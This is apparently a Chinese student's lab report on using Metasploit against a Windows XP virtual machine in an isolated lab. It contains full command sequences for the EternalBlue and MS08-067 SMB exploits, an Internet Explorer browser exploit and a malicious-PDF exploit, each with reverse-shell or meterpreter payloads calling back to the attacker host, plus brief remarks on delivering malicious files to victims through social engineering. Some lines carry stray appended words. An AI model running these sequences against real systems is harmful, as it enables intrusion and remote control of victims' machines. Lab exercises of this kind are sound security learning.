1、 實踐內容html
本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:linux
2、報告內容shell
一、實驗環境:windows
·攻擊機:kali linux ip:192.168.5.146api
·靶機:windows xp ip:192.168.5.147瀏覽器
·且兩個虛擬機相互ping得通session
二、實驗過程tcp
2.2.1 主動攻擊(成功,不惟一)學習
·主動攻擊 ms17_010_eternalblue(失敗,不惟一)編碼
--雖然攻擊失敗,可是Windows XP 遭受的攻擊後直接藍屏重啓,開機後有告警,,再次嘗試後,Windows XP直接黑屏了,以下圖
use exploit/windows/smb/ms17_010_eternalblue //使用模塊 set payload generic/shell_reverse_tcp //設置tcp反彈鏈接 set LPORT 5133 //攻擊機端口 set LHOST 192.168.5.146 //攻擊機ip set RHOST 192.168.5.147 //被攻擊者ip exploit //執行
·主動攻擊 ms08_067_netapi(成功,不惟一)
--攻擊成功,kali終端得到提權,輸入指令能查看到Windows XP 的ip地址:192.168.5.147
use exploit/windows/smb/ms08_067_netapi //使用模塊
set payload generic/shell_reverse_tcp //設置tcp反彈鏈接
set LPORT 5133 //設置攻擊機端口 set LHOST 192.168.5.146 //設置攻擊機IP set RHOST 192.168.5.147 //設置靶機IP exploit
2.2.2 針對瀏覽器的攻擊(成功,不惟一)
·針對瀏覽器 ms11_50(成功,不惟一)
--在Windows XP 打開生成的連接後創建session並鏈接,輸入指令 session 創建鏈接後,輸入 session -i 1 查看信息
use windows/browser/ms11_050_mshtml_cobjectelement set payload windows/meterpreter/reverse_http //http反向回連 set LHOST 192.168.5.146 //攻擊機ip set LPORT 5133 //攻擊端口 set URIPATH 5133ypc //統一資源標識符路徑設置 exploit //跳轉到生成的連接
2.2.3 針對客戶端的攻擊(成功,不惟一)
·針對客戶端adobe_cooltype_sing(成功,不惟一)
/*生成惡意文件*/ use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp //tcp反向回連 set LHOST 192.168.5.146 //攻擊機ip set LPORT 5133 //攻擊端口 set FILENAME 5133.pdf //設置生成pdf文件的名字 exploit //生成文件成功後會顯示該文件所存儲的目錄 //進入目錄拖拽文件至靶機 /*進入監聽模塊*/ //使用back回到msf use exploit/multi/handler //進入監聽模塊 set payload windows/meterpreter/reverse_tcp //tcp反向鏈接 set LHOST 192.168.5.146 //攻擊機ip set LPORT 5133 //攻擊端口固定 exploit //在靶機中打開文件,攻擊成功
2.2.4 成功應用一個輔助模塊(成功,惟一)
·輔助模塊:auxiliary/scanner/portscan/ack
運用TCP中的ACK響應包檢查端口的開放狀態以及是否被屏蔽(成功,惟一)
use auxiliary/scanner/portscan/ack search auxiliary set payload windows/meterpreter/reverse_tcp options set RHOST 192.168.6.147 exploit
--在auxiliary中輸入指令 search auxiliary 進行查找
--進行攻擊後以下圖所示,auxiliary模塊執行完畢
3、問題回答
一、用本身的話解釋什麼是exploit,payload,encode
·exploit:執行攻擊,產生攻擊模塊的文件
·payload:載荷,傳輸進靶機以後爲攻擊者服務
·encode:字面意思,編碼,改變shellcode,對其進行假裝
二、離實戰還缺些什麼技術或步驟?
·技術:技術欠缺不少,不少攻擊不成功都找不到正確的緣由,手段單一,能夠變化更多
·社會工程學攻擊:將生成好的惡意文件或代碼包裝一下發給受害者,找機會進行觸發回連,固然回連也不能被發現
4、實驗感想
這一次實驗咱們熟悉了MSF的六大模塊,也弄清楚了它們具體的用法,爲我之後的學習打下了必定的基礎,可是也發現了許多操做系統已經修補了之前存在的漏洞,對於我這樣的小萌新來講,找到一個新的漏洞太難啦。